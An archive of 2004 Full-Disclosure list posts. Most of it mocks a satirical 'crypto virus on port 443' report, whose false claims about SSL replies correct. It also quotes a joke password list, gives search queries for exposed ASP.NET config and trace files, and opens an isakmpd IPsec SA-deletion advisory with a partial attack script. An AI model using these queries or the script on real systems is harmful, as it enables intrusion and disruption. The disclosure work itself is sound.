systems were not sounding the red alarms like they should have been (we'll
get to THAT one later).

There appears to be a new virus in town and it's affecting Windows and UNIX
web servers! I have not identified a pattern of infection yet but the virus
is clearly advancing but it only affects web servers!

The virus works on port 443. It seems to accept inbound connections on that
port as well and, presumably, awaits for commands from some series of
servers elsewhere. Perhaps taking orders? I also captured some of the
traffic and attempted to analyze it up but it looks like -- you heard it
here first, folks -- the payload is encrypted! Is this the first of a coming
storm of crypto viruses we've all been eagerly fearing? (I have already sent
a copy of the payload to the distributed.net people so they can try to use
some of those wasting cycles to decipher it like they did the last one!)

I have taken the liberty of naming the virus already. I looked in
etc/services and saw that this port is for and it is something called "ssl"
so I am calling it w32.ssl.b (b for bilano, since I discovered this wretched
thing!)

I called in our webmaster and showed him the data. He is either too stupid
to know what's going on or he takes me for a fool. I got him in the
conference room and showed him the print outs. He tried to convince me it
was not a virus and just normal web traffic but web traffic is on port 80!
No fooling old Bill! LOL! So I told him to gather his stuff up and gave him
his marching orders. I have no time for this kind of bull, what with the
OPENBSD virus last week (still picking up the pieces there). He must have
known I was on to him because he was just laughing on his way out the front
door. He may have even been involved with the infection! Good riddance,
chump!

At any rate, this is your heads up, folks! You heard it here first! Be on
the lookout for this first, very nasty CRYPTO VIRUS!

P.S. I wonder if this virus was from a spam-gang?!

P.P.S. Check out my bloglog in my sig!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Rodrigo Gutierrez]

Has george bush become a security researcher? Htf people can answer to this
thread?... Is this GOOBLES AGAIN?

Rodrigo.- 

-Mensaje original-
De: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] En nombre de Meeusen,
Charles D
Enviado el: Martes, 08 de Junio de 2004 13:50
Para: [EMAIL PROTECTED]
Asunto: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!

"Men like me, we need a room full of clues"

--Doug.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Harlan Carvey
Sent: Tuesday, June 08, 2004 12:40 PM
To: [EMAIL PROTECTED]
Cc: Billy B. Bilano
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


Bill,

>From your post, you don't seem to have a great deal of
detailed information to share about this issue...
 
> The virus works on port 443. 

Wouldn't it then be, by definition, a worm?

> It seems to accept inbound connections on that port as well and, 
> presumably, awaits for commands from some series of servers elsewhere. 
> Perhaps taking orders?

What information do you have to support this assumption?

> I also captured some of the
> traffic and attempted to analyze it up but it looks like -- you heard 
> it here first, folks -- the payload is encrypted!

If this worm runs over SSL, as you say, then wouldn't you expect it to be
encrypted?  

> Is this the first of a coming
> storm of crypto viruses we've all been eagerly fearing?

Is it?
http://www.us-cert.gov/current/current_activity.html#pct

http://www.cert.org/advisories/CA-2002-27.html

To be totally honest, Bill, I don't see a great deal of information in your
post that supports any of your assertions/assumptions.  If this thing is
spreading the way you say it is, then it's a worm.  

Regardless, there isn't any information in your post that clearly shows that
this worm infects both Windows and Unix hosts.  In fact, one thing that does
seem clear in your post is that you haven't collected any information from
the "infected" hosts, but rather all you've got so far is network traffic
via Ethereal...and to be honest, any worm running over SSL is going to be
encrypted...
 
> At any rate, this is your heads up, folks! You heard it here first! Be 
> on the lookout for this first, very nasty CRYPTO VIRUS!

Thanks.  Noted.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Jakob Jünger]

Hi,

I just can admit to what Billy wrote. The Firewall of my PDA is getting
hot. It plays "Yellow Submarine" everytime I press the escape-key. It
has to be something like this crypto-thing. I don't know what "crypto"
means but it seems to be encrypted with EnglishLanguageProtocol.
Believe me, I have been the administrator of my PDA since I was three
years old.

Jakob

> Whatever ssl is, I don't know but it's using the so-called "ssl"
> port on the web servers.

> But this port 443 is not SSH! Why should it be encrypted? And what
> is this "ssl" thing? I've been in IT for many years and I am now IT
> Director here at the bank... I would think that I would know what
> "ssl" would be. I don't think this worm has anything to do with
> whatever "ssl" is. Does anybody even still use ssl? That's probably
> why the hackers chose it.

>Sorry to say but it is not! I checked my incoming traffic again this
morning
>and the attack on port 443 is still coming in full steam ahead! I
don't know
>what's going on, but I am about to block that port on my firewall.
Some
>nitwit (probably the idiot that was here before I became IT Director)
>somehow, for some reason, deliberately opened port 443 on the
firewalls!

>I am beginning to think that this is the first wave of the new coming
global
>crypto-storm!

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Billy B. Bilano]

Kenneth,

These are insidious hackers!

I did what you said and I am getting an exact duplicate of our web site!
They have probably infiltrated the system and are using this to capture our
customers' login information and passing it back to them encrypted! I can't
believe this!

I've already called a local consulting firm and they will be doing an eval
this Thursday of our security measures that we've taken. Then, I am going to
call the webmaster I just fired over this back in and have him sit in front
of their report and see if he has anything to say for himself. Hah!

Also, right before I wrote this message I blocked port 443 in and out on our
firewall at the bank! I will be going over these servers very carefully
tonight to look for anything wacky or goofy.


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS



- Original Message - 
From: "Ng, Kenneth (US)" <[EMAIL PROTECTED]>
To: "'Billy B. Bilano'" <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 1:51 PM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Question is, are you supposed to have a SSL server on that box?  If so,
> that's what it is.  If not, then you definitely have a problem.  Try
> connecting to that box with the URL you normally use, just use "https"
> instead of "http".  If you get the "normal" page, then someone turned on
> https without realizing it.  If you get something different, then you
> investigate.
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Possible First Crypto Virus Definitely Disc overed!

[Ng, Kenneth (US)]

Question is, are you supposed to have a SSL server on that box?  If so,
that's what it is.  If not, then you definitely have a problem.  Try
connecting to that box with the URL you normally use, just use "https"
instead of "http".  If you get the "normal" page, then someone turned on
https without realizing it.  If you get something different, then you
investigate.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Billy B.
Bilano
Sent: Tuesday, June 08, 2004 12:46 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


Steve,

Sorry to say but it is not! I checked my incoming traffic again this morning
and the attack on port 443 is still coming in full steam ahead! I don't know
what's going on, but I am about to block that port on my firewall. Some
nitwit (probably the idiot that was here before I became IT Director)
somehow, for some reason, deliberately opened port 443 on the firewalls!

I am beginning to think that this is the first wave of the new coming global
crypto-storm!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS



- Original Message - 
From: "-, Steve" <--->
To: "Billy B. Bilano" <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 11:34 AM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Please tell me this is just a really bad joke?
>
> -Original Message-
> From: Billy B. Bilano
> [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, June 08, 2004 10:53 AM
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Possible First Crypto Virus Definitely
> Discovered!
>
> Salutations, amigos!
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


*
The information in this email is confidential and may be legally privileged.
It is intended solely for the addressee. Access to this email by anyone else
is unauthorized. 

If you are not the intended recipient, any disclosure, copying, distribution
or any action taken or omitted to be taken in reliance on it, is prohibited
and may be unlawful. When addressed to our clients any opinions or advice
contained in this email are subject to the terms and conditions expressed in
the governing KPMG client engagement letter. 
*

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re[2]: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Thierry]

Hello Listmembers,

A brief call to the list: Please don't feed the troll.
My mail treshold from this list has enough bs.

Thanks.
-- 
Best regards,
 Thierrymailto:[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Steve Boone]

How about renaming it to [EMAIL PROTECTED]  More fitting methinks.  :-)

-Original Message-
From: Billy B. Bilano
[mailto:[EMAIL PROTECTED] 
Sent: Tuesday, June 08, 2004 9:53 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


Salutations, amigos!

Bill Bilano here, reporting in from the front-lines! I've got some
disturbing news that I've got to get some answers about while I share. I
think we're about to come under full hacker attack at any second! And to
those people that said us folks talking about crypto viruses were being
chicken littles... let me tell you, the sky just fell! And it is HEAVY!

I was sitting at my desk doing more research on the OPENBSD virus I
discovered last week. I was watching ethereal and monitoring the traffic
coming in and out of the facility and I saw a ton of traffic coming
straight
for our web servers! The routers, firewalls, and intrusion detraction
systems were not sounding the red alarms like they should have been
(we'll
get to THAT one later).

There appears to be a new virus in town and it's affecting Windows and
UNIX
web servers! I have not identified a pattern of infection yet but the
virus
is clearly advancing but it only affects web servers!

The virus works on port 443. It seems to accept inbound connections on
that
port as well and, presumably, awaits for commands from some series of
servers elsewhere. Perhaps taking orders? I also captured some of the
traffic and attempted to analyze it up but it looks like -- you heard it
here first, folks -- the payload is encrypted! Is this the first of a
coming
storm of crypto viruses we've all been eagerly fearing? (I have already
sent
a copy of the payload to the distributed.net people so they can try to
use
some of those wasting cycles to decipher it like they did the last one!)

I have taken the liberty of naming the virus already. I looked in
etc/services and saw that this port is for and it is something called
"ssl"
so I am calling it w32.ssl.b (b for bilano, since I discovered this
wretched
thing!)

I called in our webmaster and showed him the data. He is either too
stupid
to know what's going on or he takes me for a fool. I got him in the
conference room and showed him the print outs. He tried to convince me
it
was not a virus and just normal web traffic but web traffic is on port
80!
No fooling old Bill! LOL! So I told him to gather his stuff up and gave
him
his marching orders. I have no time for this kind of bull, what with the
OPENBSD virus last week (still picking up the pieces there). He must
have
known I was on to him because he was just laughing on his way out the
front
door. He may have even been involved with the infection! Good riddance,
chump!

At any rate, this is your heads up, folks! You heard it here first! Be
on
the lookout for this first, very nasty CRYPTO VIRUS!

P.S. I wonder if this virus was from a spam-gang?!

P.P.S. Check out my bloglog in my sig!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Jason Bethune]

This is a hoax...check out his site he is known for things like this.

Jason Bethune

 

IT Specialist

Town of Kentville

354 Main Street

Kentville, NS 

B4N 1K6

 

www.town.kentville.ns.ca


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of James Bliss
Sent: Tuesday, June 08, 2004 2:46 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!

> Whatever ssl is, I don't know but it's using the so-called "ssl" port on
> the web servers. I don't think it has anything to do with whatever ssl
> was back in the old days of UNIX. It has a lower port number and that
> means it's an older port! Probably from the 1970s!
>
> Besides, why should I see any encrypted traffic on any port other than
> SSH? I don't expect to see encryption on anything other than the SSH
> port 22 (which is a very old port).

You are kidding, right?  SSL = Secured Sockets Layer.  It probably includes 
encryption.  It would not be too _SECURE_ if it was plain text.

SSH = Secured Shell

Notice the use of _SECURED_ in both their names?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Oliver Welter]

hi Guys,
I'm new to the list, so hello first ;)
I really dont know if you are just kidding or if I missunderstod your 
post...
Port 443 is the SecureHTTP protocol (https) - so it is correct that it 
is bound to a webserver process and it is correct that SSL-encryptet 
traffic goes in and out - so whats the matter ?

Oliver
--
Diese Nachricht wurde digital unterschrieben
oliwel's public key: http://www.oliwel.de/oliwel.crt
Basiszertifikat: http://www.ldv.ei.tum.de/page72


smime.p7s
Description: S/MIME Cryptographic Signature

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[dila]

j00 d0nt f00l u5

"Billy B. Bilano" <[EMAIL PROTECTED]> wrote:
>
>Salutations, amigos!
>
>Bill Bilano here, reporting in from the front-lines! I've got some
>disturbing news that I've got to get some answers about while I share. I
>think we're about to come under full hacker attack at any second! And to
>those people that said us folks talking about crypto viruses were being
>chicken littles... let me tell you, the sky just fell! And it is HEAVY!
>
>I was sitting at my desk doing more research on the OPENBSD virus I
>discovered last week. I was watching ethereal and monitoring the traffic
>coming in and out of the facility and I saw a ton of traffic coming straight
>for our web servers! The routers, firewalls, and intrusion detraction
>systems were not sounding the red alarms like they should have been (we'll
>get to THAT one later).
>
>There appears to be a new virus in town and it's affecting Windows and UNIX
>web servers! I have not identified a pattern of infection yet but the virus
>is clearly advancing but it only affects web servers!
>
>The virus works on port 443. It seems to accept inbound connections on that
>port as well and, presumably, awaits for commands from some series of
>servers elsewhere. Perhaps taking orders? I also captured some of the
>traffic and attempted to analyze it up but it looks like -- you heard it
>here first, folks -- the payload is encrypted! Is this the first of a coming
>storm of crypto viruses we've all been eagerly fearing? (I have already sent
>a copy of the payload to the distributed.net people so they can try to use
>some of those wasting cycles to decipher it like they did the last one!)
>
>I have taken the liberty of naming the virus already. I looked in
>etc/services and saw that this port is for and it is something called "ssl"
>so I am calling it w32.ssl.b (b for bilano, since I discovered this wretched
>thing!)
>
>I called in our webmaster and showed him the data. He is either too stupid
>to know what's going on or he takes me for a fool. I got him in the
>conference room and showed him the print outs. He tried to convince me it
>was not a virus and just normal web traffic but web traffic is on port 80!
>No fooling old Bill! LOL! So I told him to gather his stuff up and gave him
>his marching orders. I have no time for this kind of bull, what with the
>OPENBSD virus last week (still picking up the pieces there). He must have
>known I was on to him because he was just laughing on his way out the front
>door. He may have even been involved with the infection! Good riddance,
>chump!
>
>At any rate, this is your heads up, folks! You heard it here first! Be on
>the lookout for this first, very nasty CRYPTO VIRUS!
>
>P.S. I wonder if this virus was from a spam-gang?!
>
>P.P.S. Check out my bloglog in my sig!
>
>
>Mr. Billy B. Bilano, MSCE, CCNA
>
>Expert Sysadmin Since 2003!
>'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS
>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Possible First Crypto Virus Definitely Disc overed!

[Meeusen, Charles D]

"Men like me, we need a room full of clues"

--Doug.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Harlan
Carvey
Sent: Tuesday, June 08, 2004 12:40 PM
To: [EMAIL PROTECTED]
Cc: Billy B. Bilano
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


Bill,

>From your post, you don't seem to have a great deal of
detailed information to share about this issue...
 
> The virus works on port 443. 

Wouldn't it then be, by definition, a worm?

> It seems to accept inbound connections on that
> port as well and, presumably, awaits for commands
> from some series of
> servers elsewhere. Perhaps taking orders? 

What information do you have to support this
assumption?

> I also captured some of the
> traffic and attempted to analyze it up but it looks
> like -- you heard it
> here first, folks -- the payload is encrypted!

If this worm runs over SSL, as you say, then wouldn't
you expect it to be encrypted?  

> Is this the first of a coming
> storm of crypto viruses we've all been eagerly
> fearing? 

Is it?
http://www.us-cert.gov/current/current_activity.html#pct

http://www.cert.org/advisories/CA-2002-27.html

To be totally honest, Bill, I don't see a great deal
of information in your post that supports any of your
assertions/assumptions.  If this thing is spreading
the way you say it is, then it's a worm.  

Regardless, there isn't any information in your post
that clearly shows that this worm infects both Windows
and Unix hosts.  In fact, one thing that does seem
clear in your post is that you haven't collected any
information from the "infected" hosts, but rather all
you've got so far is network traffic via
Ethereal...and to be honest, any worm running over SSL
is going to be encrypted...
 
> At any rate, this is your heads up, folks! You heard
> it here first! Be on
> the lookout for this first, very nasty CRYPTO VIRUS!

Thanks.  Noted.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[KF (lists)]

I really hope this guy is not THIS retarded...  her was certainly smart 
enough to leave the XSS enabled on his guest book (which of course he 
called a virus)...

6/8/04
Javascript hackers in my guestbook! GUESTBOOK UNDER SIEGE! I guess I 
upset somebody with my finding out about their silly port 443 virus! I 
have disabled javascript on the guessbook for the time being! No more 
javascript virus!

http://www.bilano.biz/passwords.html
some passwords so I don't forget:
network/server  passwordsystem
--- --- 
192.168.0.0/24  lipsall servers have same password to make 
it easy
they are all 
in the same rack!
192.168.1.2/32  doodoo  border router
192.168.1.3/32  doodoo  border router failover
192.168.1.7/32  mormons the server that the ceo runs for his 
church.
192.168.1.10/32 scatsun e10k (solaris)
10.200.0.10 scatsun el0k interface 2 (solaris 
root TELNET ONLY)
SQLserv1nugg3tt3r   SQL sa password (i should not 
have this but DBA don't know)
SQLserv2laps1c1eSQL sa passwd (thanks DSNIFF! 
LOL)
SQLserv3jumpsh1psa password again... why does 
he change them on each one?
openbsd rootsimple but easy to remember 
password!
openbsdcarp root
openbsdapache   root
they don't know i have this installed...
ceolaptop   helloceovmware works great!
cfolaptop   hellocfovmware again
ctpdesktop  helloctovmware! open source rules!

-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[VB]

Surely this is a poor attempt at comedy.
fyi,
The Secure Sockets Layer (SSL) is a commonly-used protocol for managing the
security of a message transmission on the Internet. SSL has recently been
succeeded by Transport Layer Security (TLS), which is based on SSL. SSL uses
a program layer located between the Internet's Hypertext Transfer Protocol
(HTTP) and Transport Control Protocol (TCP) layers. SSL is included as part
of both the Microsoft and Netscape browsers and most Web server products.
Developed by Netscape, SSL also gained the support of Microsoft and other
Internet client/server developers as well and became the de facto standard
until evolving into Transport Layer Security. The "sockets" part of the term
refers to the sockets method of passing data back and forth between a client
and a server program in a network or between program layers in the same
computer. SSL uses the public-and-private key encryption system from RSA,
which also includes the use of a digital certificate.
TLS and SSL are an integral part of most Web browsers (clients) and Web
servers. If a Web site is on a server that supports SSL, SSL can be enabled
and specific Web pages can be identified as requiring SSL access. Any Web
server can be enabled by using Netscape's SSLRef program library which can
be downloaded for noncommercial use or licensed for commercial use.

TLS and SSL are not interoperable. However, a message sent with TLS can be
handled by a client that handles SSL but not TLS.


- Original Message - 
From: "Billy B. Bilano" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 1:05 PM
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Hi Harlan! Thanks for your reply... hard to make heads or tails of what
you
> are saying though...
>
> > Wouldn't it then be, by definition, a worm?
>
> A worm or whatever you want to call it, that's cool. I just thought
"virus"
> sounds more alarming than worm! Everybody has had a worm or two, but a
virus
> is a tough cookie to crack!
>
>
> > What information do you have to support this
> > assumption?
>
> Because it is attacking our web servers and it seems to have somehow
gotten
> installed on our web servers at the same time! I don't know how it got in,
> but there is traffic going in and out of the servers on port 443 with an
> encrypted payload! I don't know what is answering on port 443 on the web
> servers, but for the life of me I can't find anything on them that looks
> like it's a virus or a worm or a troglodite or anything!
>
>
> > If this worm runs over SSL, as you say, then wouldn't
> > you expect it to be encrypted?
>
> Whatever ssl is, I don't know but it's using the so-called "ssl" port on
the
> web servers. I don't think it has anything to do with whatever ssl was
back
> in the old days of UNIX. It has a lower port number and that means it's an
> older port! Probably from the 1970s!
>
> Besides, why should I see any encrypted traffic on any port other than
SSH?
> I don't expect to see encryption on anything other than the SSH port 22
> (which is a very old port).
>
>
> > Regardless, there isn't any information in your post
> > that clearly shows that this worm infects both Windows
> > and Unix hosts.  In fact, one thing that does seem
> > clear in your post is that you haven't collected any
> > information from the "infected" hosts, but rather all
> > you've got so far is network traffic via
> > Ethereal...and to be honest, any worm running over SSL
> > is going to be encrypted...
>
> But this port 443 is not SSH! Why should it be encrypted? And what is this
> "ssl" thing? I've been in IT for many years and I am now IT Director here
at
> the bank... I would think that I would know what "ssl" would be. I don't
> think this worm has anything to do with whatever "ssl" is. Does anybody
even
> still use ssl? That's probably why the hackers chose it.
>
>
> P.S. Check out my bloglog, Harlan!
>
> 
> Mr. Billy B. Bilano, MSCE, CCNA
> 
> Expert Sysadmin Since 2003!
> 'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] FYI Only - Interesting Dot Net configuration item

[DAN MORRILL]

Good Morning List
been running some tests on an ASP dot Net web technology system, and ran 
into some things that would be good FYI from a security perspective. Since 
this is still new technology in some respects, there are some configuration 
items that should be observed, or at least noted possibly as a policy item, 
but security folks should be looking for these items when they are testing a 
dot net system.

For interests sake - go to google and run the following if you want more 
information on these files (or to observe folks that didn't do their 
security right, and to observe first hand the data that is given over. Again 
as with all security, risk is defined by the organization, this may or may 
not be risky depending on your view point.)

allinurl: "trace.axd"
allinurl: "web.config"
allinurl: "aspx.cs" for C# source
allinurl: "aspx.vb" for VBS source
Trace dot axd is a tracing function that can be controlled in the web.config 
file. Default is to not release this data, but the developer can modify the 
web.config file to show all trace data to an outside client. This data 
includes cookie session data, and other data that could be useful for 
session highjacking, and determining the physical configuration of the web 
server, including phyiscal and logical drive space. This runs in memory, and 
is purged on a FIFO basis, or when IIS is restarted.

Web.config file holds configuration data for dot net for the web server. 
Provides good configuration data about how the dot net environment is set up 
for the web server. It can also hold connection string information for 
connecting to database systems, other systems, and virtual directories if 
not using integrated security.

all source files (.CS or .VB) can provide information about how the web 
application is set up, what it imports, and in some cases holds connection 
string data for accounts database backend systems. That data is included if 
not using the obdc DSN system. (Although it could be there if any form of 
credentials are embedded anywhere in the source code for a web system).

Just thought I would pass this along as I have not seen anything like this 
posted on the network at all. My suggestion based on this data is that all 
uploaded Dot Net code bases onto a production server be configured in such a 
way that these data points are not exposed to the public. Default is that 
these are protected systems files, but a developer can change these bounds, 
and there should be a hand shake between security and development for 
production or other internet exposed systems.

Hope this was interesting.
r/
Dan

Sometimes MSN E-mail will indicate that the mesasge failed to be delivered. 
Please resend when you get those, it does not mean that the mail box is bad, 
merely that MSN mail is over worked at the time.

Otherwise, hope things are going well.
r/
Dan
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[William Warren]

have you got any code or anything to substantiate this?  Your site is 
unreachable

Billy B. Bilano wrote:
Salutations, amigos!
Bill Bilano here, reporting in from the front-lines! I've got some
disturbing news that I've got to get some answers about while I share. I
think we're about to come under full hacker attack at any second! And to
those people that said us folks talking about crypto viruses were being
chicken littles... let me tell you, the sky just fell! And it is HEAVY!
I was sitting at my desk doing more research on the OPENBSD virus I
discovered last week. I was watching ethereal and monitoring the traffic
coming in and out of the facility and I saw a ton of traffic coming straight
for our web servers! The routers, firewalls, and intrusion detraction
systems were not sounding the red alarms like they should have been (we'll
get to THAT one later).
There appears to be a new virus in town and it's affecting Windows and UNIX
web servers! I have not identified a pattern of infection yet but the virus
is clearly advancing but it only affects web servers!
The virus works on port 443. It seems to accept inbound connections on that
port as well and, presumably, awaits for commands from some series of
servers elsewhere. Perhaps taking orders? I also captured some of the
traffic and attempted to analyze it up but it looks like -- you heard it
here first, folks -- the payload is encrypted! Is this the first of a coming
storm of crypto viruses we've all been eagerly fearing? (I have already sent
a copy of the payload to the distributed.net people so they can try to use
some of those wasting cycles to decipher it like they did the last one!)
I have taken the liberty of naming the virus already. I looked in
etc/services and saw that this port is for and it is something called "ssl"
so I am calling it w32.ssl.b (b for bilano, since I discovered this wretched
thing!)
I called in our webmaster and showed him the data. He is either too stupid
to know what's going on or he takes me for a fool. I got him in the
conference room and showed him the print outs. He tried to convince me it
was not a virus and just normal web traffic but web traffic is on port 80!
No fooling old Bill! LOL! So I told him to gather his stuff up and gave him
his marching orders. I have no time for this kind of bull, what with the
OPENBSD virus last week (still picking up the pieces there). He must have
known I was on to him because he was just laughing on his way out the front
door. He may have even been involved with the infection! Good riddance,
chump!
At any rate, this is your heads up, folks! You heard it here first! Be on
the lookout for this first, very nasty CRYPTO VIRUS!
P.S. I wonder if this virus was from a spam-gang?!
P.P.S. Check out my bloglog in my sig!

Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
--
My "Foundation" verse:
Isa 54:17  No weapon that is formed against thee shall prosper; and 
every tongue that shall rise against thee in judgment thou shalt 
condemn. This is the heritage of the servants of the LORD, and their 
righteousness is of me, saith the LORD.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[James Bliss]

> Whatever ssl is, I don't know but it's using the so-called "ssl" port on
> the web servers. I don't think it has anything to do with whatever ssl
> was back in the old days of UNIX. It has a lower port number and that
> means it's an older port! Probably from the 1970s!
>
> Besides, why should I see any encrypted traffic on any port other than
> SSH? I don't expect to see encryption on anything other than the SSH
> port 22 (which is a very old port).

You are kidding, right?  SSL = Secured Sockets Layer.  It probably includes 
encryption.  It would not be too _SECURE_ if it was plain text.

SSH = Secured Shell

Notice the use of _SECURED_ in both their names?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[William Warren]

this is highly shortsighted..well maybe not..if you do not have any 
users who do not use https...:)

Billy B. Bilano wrote:
Steve,
Sorry to say but it is not! I checked my incoming traffic again this morning
and the attack on port 443 is still coming in full steam ahead! I don't know
what's going on, but I am about to block that port on my firewall. Some
nitwit (probably the idiot that was here before I became IT Director)
somehow, for some reason, deliberately opened port 443 on the firewalls!
I am beginning to think that this is the first wave of the new coming global
crypto-storm!

Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS

- Original Message - 
From: "-, Steve" <--->
To: "Billy B. Bilano" <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 11:34 AM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


Please tell me this is just a really bad joke?
-Original Message-
From: Billy B. Bilano
[mailto:[EMAIL PROTECTED]
Sent: Tuesday, June 08, 2004 10:53 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!
Salutations, amigos!

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
--
My "Foundation" verse:
Isa 54:17  No weapon that is formed against thee shall prosper; and 
every tongue that shall rise against thee in judgment thou shalt 
condemn. This is the heritage of the servants of the LORD, and their 
righteousness is of me, saith the LORD.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] unauthorized deletion of IPsec SAs in isakmpd, still

[Thomas Walpuski]

1 Abstract

  For nearly 10 months a handful of OpenBSD-developers is trying to fix
  a plethora of payload handling flaws in isakmpd. On 2004/01/13 they
  released something like a final patch to a broader public. The patch
  protects against some specific attacks, but does not solve the
  problem. 

2 Description

  Unauthorized deletion of IPsec SAs is still possible using a delete
  payload piggybacked on a initiation of main mode.

  For more details trace message_recv() ff. with gdb during an attack.

3 Affected Systems

  All (recent) versions of isakmpd are affected. The attack has been
  successfully tested against the most recent CVS-version of isakmpd.

4 The Attack

  Here we go. There is an IPsec tunnel between sg-a and sg-b:

sg-a# cat /kern/ipsec | grep SPI
SPI = 97e49ca2, Destination = , Sproto = 50
SPI = 901e38d9, Destination = , Sproto = 50

  The attacker built some little script, because this time he wants to
  shoot down a bunch of IPsec SAs:

attacker# cat during_these_hostile_and_trying_times_and_what-not
#!/bin/sh
if [ ! $# -eq 3 ]; then
  echo "usage: $0   ";
  exit;
fi

src=$1; dst=$2
spi=`echo $3 | sed 's/\(..\)/x\1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`

